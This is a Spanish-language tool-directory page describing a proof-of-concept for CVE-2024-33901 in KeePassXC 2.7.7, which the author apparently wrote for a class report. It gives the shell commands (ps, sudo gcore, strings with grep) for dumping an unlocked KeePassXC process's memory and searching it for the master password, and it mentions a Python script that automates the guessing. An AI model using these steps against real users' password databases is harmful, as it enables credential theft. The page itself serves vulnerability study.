Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-33901-ProofOfConcept — Programa corto que demuestra la vulnerabilidad CVE-2024-33901 en KeePassXC versión 2.7.7 | Kitploit
Herramientas/GitHubGitHub/gmikisilva/cve-2024-33901-proofofconcept
Descifrado de ContraseñasForensia de MemoriaAnálisis de VulnerabilidadesExplotaciónExfiltración de DatosForensia Digital
GitHubgmikisilva/cve-2024-33901-proofofconcept

CVE-2024-33901-ProofOfConcept

Programa corto que demuestra la vulnerabilidad CVE-2024-33901 en KeePassXC versión 2.7.7

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
26hace 1 añoAún no revisado

CVE-2024-33901-ProofOfConcept

Programa corto que demuestra la vulnerabilidad CVE-2024-33901 en KeePassXC versión 2.7.7

El informe para la clase podría necesitar el código fuente enlazado, por eso creé el repositorio para esto.

Cómo replicar la vulnerabilidad

  1. Abre KeePassXC y autentica la base de datos
  2. Mientras la base de datos esté autenticada, crea un archivo de volcado de memoria para ella

Esto se puede lograr obteniendo el PID, lo cual se puede hacer con este comando:

root@kitploit:~
ps aux | grep keepassxc

Y luego ejecutando este comando: sudo gcore -o keepassxc_dump PID_HERE

Por ejemplo, si el PID que obtuviste fue 1234, entonces el comando tendría que ser:

root@kitploit:~
sudo gcore -o keepassxc_dump 1234

3. Finalmente, puedes ejecutar este comando: cat keepassxc_dump.PID_HERE | strings | grep "password guess here"

Así que si el PID fuera 1234, el comando sería:

root@kitploit:~
 cat keepassxc_dump.1234 | strings | grep "password guess here"

Una vez que se crea el archivo de volcado de memoria, el ataque puede realizarse incluso si la base de datos se vuelve a bloquear o si KeePassXC está cerrado.

El código Python proporcionado realiza todos estos pasos e intenta múltiples adivinanzas de contraseña basándose en los archivos de texto proporcionados.

Descargar herramienta